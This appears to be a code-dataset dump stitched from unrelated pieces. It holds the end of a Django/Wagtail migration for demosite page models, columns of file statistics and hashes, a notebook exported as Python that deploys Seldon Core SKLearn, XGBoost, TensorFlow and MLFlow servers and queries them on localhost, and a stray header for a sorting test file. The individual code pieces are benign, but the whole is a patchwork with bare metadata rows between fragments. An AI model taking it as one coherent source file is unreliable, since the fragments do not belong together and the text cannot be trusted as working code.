('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_links', to='demosite.StandardIndexPage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='PersonPageRelatedLink',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('link_external', models.URLField(blank=True, verbose_name='External link')),
('title', models.CharField(help_text='Link title', max_length=255)),
('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_links', to='demosite.PersonPage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='HomePageRelatedLink',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('link_external', models.URLField(blank=True, verbose_name='External link')),
('title', models.CharField(help_text='Link title', max_length=255)),
('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_links', to='demosite.HomePage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='HomePageCarouselItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('link_external', models.URLField(blank=True, verbose_name='External link')),
('embed_url', models.URLField(blank=True, verbose_name='Embed URL')),
('caption', models.CharField(blank=True, max_length=255)),
('image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='carousel_items', to='demosite.HomePage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='EventPageSpeaker',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('link_external', models.URLField(blank=True, verbose_name='External link')),
('first_name', models.CharField(blank=True, max_length=255, verbose_name='Name')),
('last_name', models.CharField(blank=True, max_length=255, verbose_name='Surname')),
('image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='speakers', to='demosite.EventPage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='EventPageRelatedLink',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('link_external', models.URLField(blank=True, verbose_name='External link')),
('title', models.CharField(help_text='Link title', max_length=255)),
('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_links', to='demosite.EventPage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='EventPageCarouselItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('link_external', models.URLField(blank=True, verbose_name='External link')),
('embed_url', models.URLField(blank=True, verbose_name='Embed URL')),
('caption', models.CharField(blank=True, max_length=255)),
('image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='carousel_items', to='demosite.EventPage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='EventIndexPageRelatedLink',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('link_external', models.URLField(blank=True, verbose_name='External link')),
('title', models.CharField(help_text='Link title', max_length=255)),
('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_links', to='demosite.EventIndexPage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='ContactPage',
fields=[
('telephone', models.CharField(blank=True, max_length=20)),
('email', models.EmailField(blank=True, max_length=254)),
('address_1', models.CharField(blank=True, max_length=255)),
('address_2', models.CharField(blank=True, max_length=255)),
('city', models.CharField(blank=True, max_length=255)),
('country', models.CharField(blank=True, max_length=255)),
('post_code', models.CharField(blank=True, max_length=10)),
('page_ptr', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='+', serialize=False, to='wagtailcore.Page')),
('body', wagtail.core.fields.RichTextField(blank=True)),
('feed_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page', models.Model),
),
migrations.CreateModel(
name='BlogIndexPageRelatedLink',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('link_external', models.URLField(blank=True, verbose_name='External link')),
('title', models.CharField(help_text='Link title', max_length=255)),
('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_links', to='demosite.BlogIndexPage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='BlogEntryPageTag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content_object', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='tagged_items', to='demosite.BlogEntryPage')),
('tag', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='demosite_blogentrypagetag_items', to='taggit.Tag')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='BlogEntryPageRelatedLink',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('link_external', models.URLField(blank=True, verbose_name='External link')),
('title', models.CharField(help_text='Link title', max_length=255)),
('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_links', to='demosite.BlogEntryPage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='BlogEntryPageCarouselItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('link_external', models.URLField(blank=True, verbose_name='External link')),
('embed_url', models.URLField(blank=True, verbose_name='Embed URL')),
('caption', models.CharField(blank=True, max_length=255)),
('image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='carousel_items', to='demosite.BlogEntryPage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.AddField(
model_name='blogentrypage',
name='tags',
field=modelcluster.contrib.taggit.ClusterTaggableManager(blank=True, help_text='A comma-separated list of tags.', through='demosite.BlogEntryPageTag', to='taggit.Tag', verbose_name='Tags'),
),
]
| 63.769231
| 201
| 0.606353
| 2,533
| 24,870
| 5.797079
| 0.069878
| 0.06313
| 0.060065
| 0.094388
| 0.895328
| 0.88736
| 0.880074
| 0.873672
| 0.867815
| 0.846636
| 0
| 0.007116
| 0.242863
| 24,870
| 389
| 202
| 63.933162
| 0.772703
| 0.001809
| 0
| 0.748691
| 1
| 0
| 0.172461
| 0.022479
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.013089
| 0
| 0.02356
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a75f063c15dde42fd7fef6c6d3d3838622627b84
| 19,919
|
py
|
Python
|
doc/jupyter_execute/notebooks/server_examples.py
|
edshee/seldon-core
|
78c10fbca16a5e2a0c25b9673aa3deb220070e26
|
[
"Apache-2.0"
] | null | null | null |
doc/jupyter_execute/notebooks/server_examples.py
|
edshee/seldon-core
|
78c10fbca16a5e2a0c25b9673aa3deb220070e26
|
[
"Apache-2.0"
] | null | null | null |
doc/jupyter_execute/notebooks/server_examples.py
|
edshee/seldon-core
|
78c10fbca16a5e2a0c25b9673aa3deb220070e26
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# # Example Model Servers with Seldon
#
# ## Setup Seldon Core
#
# Use the setup notebook to [Setup Cluster](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html#Setup-Cluster) with [Ambassador Ingress](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html#Ambassador) and [Seldon Core](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html#Install-Seldon-Core). Instructions [also online](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html).
# In[ ]:
get_ipython().system('kubectl create namespace seldon')
# In[ ]:
get_ipython().system('kubectl config set-context $(kubectl config current-context) --namespace=seldon')
# In[ ]:
import json
# ## Serve SKLearn Iris Model
#
# In order to deploy SKLearn artifacts, we can leverage the [pre-packaged SKLearn inference server](https://docs.seldon.io/projects/seldon-core/en/latest/servers/sklearn.html).
# The exposed API can follow either:
#
# - The default Seldon protocol.
# - The [KFServing V2 protocol](https://docs.seldon.io/projects/seldon-core/en/latest/servers/sklearn.html##v2-kfserving-protocol-incubating).
#
# For details on each of these protocols, you can check the [documentation section on API protocols](https://docs.seldon.io/projects/seldon-core/en/latest/graph/protocols.html#v2-kfserving-protocol).
#
# ### Default Seldon protocol
#
# To deploy and start serving an SKLearn artifact using Seldon's default protocol, we can use a config like the one below:
# In[ ]:
get_ipython().run_cell_magic('writefile', '../servers/sklearnserver/samples/iris.yaml', 'apiVersion: machinelearning.seldon.io/v1alpha2\nkind: SeldonDeployment\nmetadata:\n name: sklearn\nspec:\n predictors:\n - graph:\n name: classifier\n implementation: SKLEARN_SERVER\n modelUri: gs://seldon-models/v1.13.0-dev/sklearn/iris\n name: default\n replicas: 1\n svcOrchSpec: \n env: \n - name: SELDON_LOG_LEVEL\n value: DEBUG')
# We can then apply it to deploy it to our Kubernetes cluster.
# In[ ]:
get_ipython().system('kubectl apply -f ../servers/sklearnserver/samples/iris.yaml')
# In[ ]:
get_ipython().system("kubectl rollout status deploy/$(kubectl get deploy -l seldon-deployment-id=sklearn -o jsonpath='{.items[0].metadata.name}')")
# Once it's deployed we can send our sklearn model requests
# #### REST Requests
# In[ ]:
X = get_ipython().getoutput('curl -s -d \'{"data": {"ndarray":[[1.0, 2.0, 5.0, 6.0]]}}\' -X POST http://localhost:8003/seldon/seldon/sklearn/api/v1.0/predictions -H "Content-Type: application/json"')
d=json.loads(X[0])
print(d)
# In[ ]:
from seldon_core.seldon_client import SeldonClient
sc = SeldonClient(deployment_name="sklearn", namespace="seldon")
# In[ ]:
r = sc.predict(gateway="ambassador", transport="rest", shape=(1, 4))
print(r)
assert r.success == True
# #### gRPC Requests
# In[ ]:
r = sc.predict(gateway="ambassador", transport="grpc", shape=(1, 4))
print(r)
assert r.success == True
# In[ ]:
X = get_ipython().getoutput('cd ../executor/proto && grpcurl -d \'{"data":{"ndarray":[[1.0,2.0,5.0,6.0]]}}\' -rpc-header seldon:sklearn -rpc-header namespace:seldon -plaintext -proto ./prediction.proto 0.0.0.0:8003 seldon.protos.Seldon/Predict')
d=json.loads("".join(X))
print(d)
# And delete the model we deployed
# In[ ]:
get_ipython().system('kubectl delete -f ../servers/sklearnserver/samples/iris.yaml')
# ### KFServing V2 protocol
#
# We can deploy a SKLearn artifact, exposing an API compatible with [KFServing's V2 Protocol](https://docs.seldon.io/projects/seldon-core/en/latest/servers/sklearn.html##v2-kfserving-protocol-incubating) by specifying the `protocol` of our `SeldonDeployment` as `kfserving`.
# For example, we can consider the config below:
# In[ ]:
get_ipython().run_cell_magic('writefile', './resources/iris-sklearn-v2.yaml', 'apiVersion: machinelearning.seldon.io/v1\nkind: SeldonDeployment\nmetadata:\n name: sklearn\nspec:\n name: iris\n protocol: kfserving\n predictors:\n - graph:\n children: []\n implementation: SKLEARN_SERVER\n modelUri: gs://seldon-models/sklearn/iris-0.23.2/lr_model\n name: classifier\n name: default\n replicas: 1')
# We can then apply it to deploy our model to our Kubernetes cluster.
# In[ ]:
get_ipython().system('kubectl apply -f resources/iris-sklearn-v2.yaml')
# In[ ]:
get_ipython().system("kubectl rollout status deploy/$(kubectl get deploy -l seldon-deployment-id=sklearn -o jsonpath='{.items[0].metadata.name}')")
# Once it's deployed, we can send inference requests to our model.
# Note that, since it's using the KFServing's V2 Protocol, these requests will be different to the ones using the default Seldon Protocol.
# In[ ]:
import json
import requests
inference_request = {
"inputs": [
{"name": "predict", "shape": [1, 4], "datatype": "FP32", "data": [[1, 2, 3, 4]]}
]
}
endpoint = "http://localhost:8003/seldon/seldon/sklearn/v2/models/infer"
response = requests.post(endpoint, json=inference_request)
print(json.dumps(response.json(), indent=2))
assert response.ok
# Finally, we can delete the model we deployed.
# In[ ]:
get_ipython().system('kubectl delete -f resources/iris-sklearn-v2.yaml')
# ## Serve XGBoost Iris Model
#
# In order to deploy XGBoost models, we can leverage the [pre-packaged XGBoost inference server](https://docs.seldon.io/projects/seldon-core/en/latest/servers/xgboost.html).
# The exposed API can follow either:
#
# - The default Seldon protocol.
# - The [KFServing V2 protocol](https://docs.seldon.io/projects/seldon-core/en/latest/servers/xgboost.html##v2-kfserving-protocol-incubating).
#
# For details on each of these protocols, you can check the [documentation section on API protocols](https://docs.seldon.io/projects/seldon-core/en/latest/graph/protocols.html#v2-kfserving-protocol).
# ### Default Seldon protocol
#
# We can deploy a XGBoost model uploaded to an object store by using the XGBoost model server implementation as shown in the config below:
# In[ ]:
get_ipython().run_cell_magic('writefile', 'resources/iris.yaml', 'apiVersion: machinelearning.seldon.io/v1\nkind: SeldonDeployment\nmetadata:\n name: xgboost\nspec:\n name: iris\n predictors:\n - graph:\n children: []\n implementation: XGBOOST_SERVER\n modelUri: gs://seldon-models/xgboost/iris\n name: classifier\n name: default\n replicas: 1')
# And then we apply it to deploy it to our kubernetes cluster
# In[ ]:
get_ipython().system('kubectl apply -f resources/iris.yaml')
# In[ ]:
get_ipython().system("kubectl rollout status deploy/$(kubectl get deploy -l seldon-deployment-id=xgboost -o jsonpath='{.items[0].metadata.name}')")
# #### Rest Requests
# In[ ]:
X = get_ipython().getoutput('curl -s -d \'{"data": {"ndarray":[[1.0, 2.0, 5.0, 6.0]]}}\' -X POST http://localhost:8003/seldon/seldon/xgboost/api/v1.0/predictions -H "Content-Type: application/json"')
d=json.loads(X[0])
print(d)
# In[ ]:
from seldon_core.seldon_client import SeldonClient
sc = SeldonClient(deployment_name="xgboost", namespace="seldon")
# In[ ]:
r = sc.predict(gateway="ambassador", transport="rest", shape=(1, 4))
print(r)
assert r.success == True
# #### gRPC Requests
# In[ ]:
r = sc.predict(gateway="ambassador", transport="grpc", shape=(1, 4))
print(r)
assert r.success == True
# In[ ]:
X = get_ipython().getoutput('cd ../executor/proto && grpcurl -d \'{"data":{"ndarray":[[1.0,2.0,5.0,6.0]]}}\' -rpc-header seldon:xgboost -rpc-header namespace:seldon -plaintext -proto ./prediction.proto 0.0.0.0:8003 seldon.protos.Seldon/Predict')
d=json.loads("".join(X))
print(d)
# And delete the model we deployed
# In[ ]:
get_ipython().system('kubectl delete -f resources/iris.yaml')
# ### KFServing V2 protocol
#
# We can deploy a XGBoost model, exposing an API compatible with [KFServing's V2 Protocol](https://docs.seldon.io/projects/seldon-core/en/latest/servers/xgboost.html##v2-kfserving-protocol-incubating) by specifying the `protocol` of our `SeldonDeployment` as `kfserving`.
# For example, we can consider the config below:
# In[ ]:
get_ipython().run_cell_magic('writefile', './resources/iris-xgboost-v2.yaml', 'apiVersion: machinelearning.seldon.io/v1\nkind: SeldonDeployment\nmetadata:\n name: xgboost\nspec:\n name: iris\n protocol: kfserving\n predictors:\n - graph:\n children: []\n implementation: XGBOOST_SERVER\n modelUri: gs://seldon-models/xgboost/iris\n name: classifier\n name: default\n replicas: 1')
# We can then apply it to deploy our model to our Kubernetes cluster.
# In[ ]:
get_ipython().system('kubectl apply -f ./resources/iris-xgboost-v2.yaml')
# In[ ]:
get_ipython().system("kubectl rollout status deploy/$(kubectl get deploy -l seldon-deployment-id=xgboost -o jsonpath='{.items[0].metadata.name}')")
# Once it's deployed, we can send inference requests to our model.
# Note that, since it's using the KFServing's V2 Protocol, these requests will be different to the ones using the default Seldon Protocol.
# In[ ]:
import json
import requests
inference_request = {
"inputs": [
{"name": "predict", "shape": [1, 4], "datatype": "FP32", "data": [[1, 2, 3, 4]]}
]
}
endpoint = "http://localhost:8003/seldon/seldon/xgboost/v2/models/infer"
response = requests.post(endpoint, json=inference_request)
print(json.dumps(response.json(), indent=2))
assert response.ok
# Finally, we can delete the model we deployed.
# In[ ]:
get_ipython().system('kubectl delete -f ./resources/iris-xgboost-v2.yaml')
# ## Serve Tensorflow MNIST Model
# We can deploy a tensorflow model uploaded to an object store by using the
# tensorflow model server implementation as the config below.
#
# This notebook contains two examples, one which shows how you can use the
# TFServing prepackaged serve with the Seldon Protocol, and a second one which
# shows how you can deploy it using the tensorlfow protocol (so you can send
# requests of the exact format as you would to a tfserving server).
# ### Serve Tensorflow MNIST Model with Seldon Protocol
#
# The config file below shows how you can deploy your Tensorflow model which
# exposes the Seldon protocol.
# In[ ]:
get_ipython().run_cell_magic('writefile', './resources/mnist_rest.yaml', 'apiVersion: machinelearning.seldon.io/v1alpha2\nkind: SeldonDeployment\nmetadata:\n name: tfserving\nspec:\n name: mnist\n predictors:\n - graph:\n children: []\n implementation: TENSORFLOW_SERVER\n modelUri: gs://seldon-models/tfserving/mnist-model\n name: mnist-model\n parameters:\n - name: signature_name\n type: STRING\n value: predict_images\n - name: model_name\n type: STRING\n value: mnist-model\n - name: model_input\n type: STRING\n value: images\n - name: model_output\n type: STRING\n value: scores \n name: default\n replicas: 1')
# In[ ]:
get_ipython().system('kubectl apply -f ./resources/mnist_rest.yaml')
# In[ ]:
get_ipython().system("kubectl rollout status deploy/$(kubectl get deploy -l seldon-deployment-id=tfserving -o jsonpath='{.items[0].metadata.name}')")
# In[ ]:
from seldon_core.seldon_client import SeldonClient
sc = SeldonClient(deployment_name="tfserving", namespace="seldon")
# #### REST Request
# In[ ]:
r = sc.predict(gateway="ambassador", transport="rest", shape=(1, 784))
print(r)
assert r.success == True
# #### gRPC Request
# In[ ]:
r = sc.predict(gateway="ambassador", transport="grpc", shape=(1, 784))
print(r)
assert r.success == True
# And delete the model we deployed
# In[ ]:
get_ipython().system('kubectl delete -f ./resources/mnist_rest.yaml')
# ### Serve Tensorflow Model with Tensorflow protocol
#
# The config file below shows how you can deploy your Tensorflow model which
# exposes the Tensorflow protocol.
# In[ ]:
get_ipython().run_cell_magic('writefile', './resources/halfplustwo_rest.yaml', 'apiVersion: machinelearning.seldon.io/v1alpha2\nkind: SeldonDeployment\nmetadata:\n name: hpt\nspec:\n name: hpt\n protocol: tensorflow\n transport: rest\n predictors:\n - graph:\n children: []\n implementation: TENSORFLOW_SERVER\n modelUri: gs://seldon-models/tfserving/half_plus_two\n name: halfplustwo\n parameters:\n - name: model_name\n type: STRING\n value: halfplustwo\n name: default\n replicas: 1')
# In[ ]:
get_ipython().system('kubectl apply -f ./resources/halfplustwo_rest.yaml')
# In[ ]:
get_ipython().system("kubectl rollout status deploy/$(kubectl get deploy -l seldon-deployment-id=hpt -o jsonpath='{.items[0].metadata.name}')")
# In[ ]:
import json
X = get_ipython().getoutput('curl -s -d \'{"instances": [1.0, 2.0, 5.0]}\' -X POST http://localhost:8003/seldon/seldon/hpt/v1/models/halfplustwo/:predict -H "Content-Type: application/json"')
d=json.loads("".join(X))
print(d)
assert(d["predictions"][0] == 2.5)
# In[ ]:
X = get_ipython().getoutput('cd ../executor/proto && grpcurl -d \'{"model_spec":{"name":"halfplustwo"},"inputs":{"x":{"dtype": 1, "tensor_shape": {"dim":[{"size": 3}]}, "floatVal" : [1.0, 2.0, 3.0]}}}\' -rpc-header seldon:hpt -rpc-header namespace:seldon -plaintext -proto ./prediction_service.proto 0.0.0.0:8003 tensorflow.serving.PredictionService/Predict')
d=json.loads("".join(X))
print(d)
assert(d["outputs"]["x"]["floatVal"][0] == 2.5)
# In[ ]:
get_ipython().system('kubectl delete -f ./resources/halfplustwo_rest.yaml')
# ## Serve MLFlow Elasticnet Wines Model
# We can deploy an MLFlow model uploaded to an object store by using the MLFlow
# model server implementation as the config below:
# In[ ]:
get_ipython().run_cell_magic('writefile', './resources/elasticnet_wine.yaml', 'apiVersion: machinelearning.seldon.io/v1alpha2\nkind: SeldonDeployment\nmetadata:\n name: mlflow\nspec:\n name: wines\n predictors:\n - componentSpecs:\n - spec:\n # We are setting high failureThreshold as installing conda dependencies\n # can take long time and we want to avoid k8s killing the container prematurely\n containers:\n - name: classifier\n livenessProbe:\n initialDelaySeconds: 80\n failureThreshold: 200\n periodSeconds: 5\n successThreshold: 1\n httpGet:\n path: /health/ping\n port: http\n scheme: HTTP\n readinessProbe:\n initialDelaySeconds: 80\n failureThreshold: 200\n periodSeconds: 5\n successThreshold: 1\n httpGet:\n path: /health/ping\n port: http\n scheme: HTTP\n graph:\n children: []\n implementation: MLFLOW_SERVER\n modelUri: gs://seldon-models/v1.10.0-dev/mlflow/elasticnet_wine\n name: classifier\n name: default\n replicas: 1')
# In[ ]:
get_ipython().system('kubectl apply -f ./resources/elasticnet_wine.yaml')
# In[ ]:
get_ipython().system("kubectl rollout status deploy/$(kubectl get deploy -l seldon-deployment-id=mlflow -o jsonpath='{.items[0].metadata.name}')")
# ### REST requests
# In[ ]:
X = get_ipython().getoutput('curl -s -d \'{"data": {"ndarray":[[0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1.0,1.1]]}}\' -X POST http://localhost:8003/seldon/seldon/mlflow/api/v1.0/predictions -H "Content-Type: application/json"')
d=json.loads(X[0])
print(d)
# In[ ]:
from seldon_core.seldon_client import SeldonClient
sc = SeldonClient(deployment_name="mlflow", namespace="seldon")
# In[ ]:
r = sc.predict(gateway="ambassador", transport="rest", shape=(1, 11))
print(r)
assert r.success == True
# ### gRPC Requests
# In[ ]:
X = get_ipython().getoutput('cd ../executor/proto && grpcurl -d \'{"data":{"ndarray":[[0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1.0,1.1]]}}\' -rpc-header seldon:mlflow -rpc-header namespace:seldon -plaintext -proto ./prediction.proto 0.0.0.0:8003 seldon.protos.Seldon/Predict')
d=json.loads("".join(X))
print(d)
# In[ ]:
r = sc.predict(gateway="ambassador", transport="grpc", shape=(1, 11))
print(r)
assert r.success == True
# In[ ]:
get_ipython().system('kubectl delete -f ./resources/elasticnet_wine.yaml')
# ## MLFlow kfserving v2 protocol
# In[ ]:
get_ipython().run_cell_magic('writefile', './resources/elasticnet_wine_v2.yaml', 'apiVersion: machinelearning.seldon.io/v1alpha2\nkind: SeldonDeployment\nmetadata:\n name: mlflow\nspec:\n protocol: kfserving # Activate v2 protocol\n name: wines\n predictors:\n - graph:\n children: []\n implementation: MLFLOW_SERVER\n modelUri: gs://seldon-models/v1.10.0-dev/mlflow/elasticnet_wine\n name: classifier\n name: default\n replicas: 1')
# In[ ]:
get_ipython().system('kubectl apply -f ./resources/elasticnet_wine_v2.yaml')
# In[ ]:
get_ipython().system("kubectl rollout status deploy/$(kubectl get deploy -l seldon-deployment-id=mlflow -o jsonpath='{.items[0].metadata.name}')")
# ## REST requests
# In[ ]:
import json
import requests
inference_request = {
"parameters": {"content_type": "pd"},
"inputs": [
{
"name": "fixed acidity",
"shape": [1],
"datatype": "FP32",
"data": [7.4],
"parameters": {"content_type": "np"},
},
{
"name": "volatile acidity",
"shape": [1],
"datatype": "FP32",
"data": [0.7000],
"parameters": {"content_type": "np"},
},
{
"name": "citric acidity",
"shape": [1],
"datatype": "FP32",
"data": [0],
"parameters": {"content_type": "np"},
},
{
"name": "residual sugar",
"shape": [1],
"datatype": "FP32",
"data": [1.9],
"parameters": {"content_type": "np"},
},
{
"name": "chlorides",
"shape": [1],
"datatype": "FP32",
"data": [0.076],
"parameters": {"content_type": "np"},
},
{
"name": "free sulfur dioxide",
"shape": [1],
"datatype": "FP32",
"data": [11],
"parameters": {"content_type": "np"},
},
{
"name": "total sulfur dioxide",
"shape": [1],
"datatype": "FP32",
"data": [34],
"parameters": {"content_type": "np"},
},
{
"name": "density",
"shape": [1],
"datatype": "FP32",
"data": [0.9978],
"parameters": {"content_type": "np"},
},
{
"name": "pH",
"shape": [1],
"datatype": "FP32",
"data": [3.51],
"parameters": {"content_type": "np"},
},
{
"name": "sulphates",
"shape": [1],
"datatype": "FP32",
"data": [0.56],
"parameters": {"content_type": "np"},
},
{
"name": "alcohol",
"shape": [1],
"datatype": "FP32",
"data": [9.4],
"parameters": {"content_type": "np"},
},
],
}
endpoint = "http://localhost:8003/seldon/seldon/mlflow/v2/models/infer"
response = requests.post(endpoint, json=inference_request)
print(json.dumps(response.json(), indent=2))
assert response.ok
# In[ ]:
get_ipython().system('kubectl delete -f ./resources/elasticnet_wine_v2.yaml')
| 31.76874
| 1,211
| 0.651338
| 2,652
| 19,919
| 4.841252
| 0.123303
| 0.032713
| 0.031778
| 0.036451
| 0.847807
| 0.804112
| 0.763221
| 0.728328
| 0.713295
| 0.665083
| 0
| 0.022342
| 0.191074
| 19,919
| 626
| 1,212
| 31.819489
| 0.774468
| 0.26161
| 0
| 0.509804
| 0
| 0.117647
| 0.608834
| 0.156177
| 0
| 0
| 0
| 0
| 0.063725
| 1
| 0
| false
| 0
| 0.058824
| 0
| 0.058824
| 0.093137
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a780dac3769b7b97d40de9440954a1ffc741bea5
| 1,667
|
py
|
Python
|
data_structures/sorting_algos/selection/test_selection.py
|
jeremyCtown/data-structures-and-algorithms
|
d4ba8741f858fb5298f8ce560240373fb7742e20
|
[
"MIT"
] | null | null | null |
data_structures/sorting_algos/selection/test_selection.py
|
jeremyCtown/data-structures-and-algorithms
|
d4ba8741f858fb5298f8ce560240373fb7742e20
|
[
"MIT"
] | null | null | null |
data_structures/sorting_algos/selection/test_selection.py
|
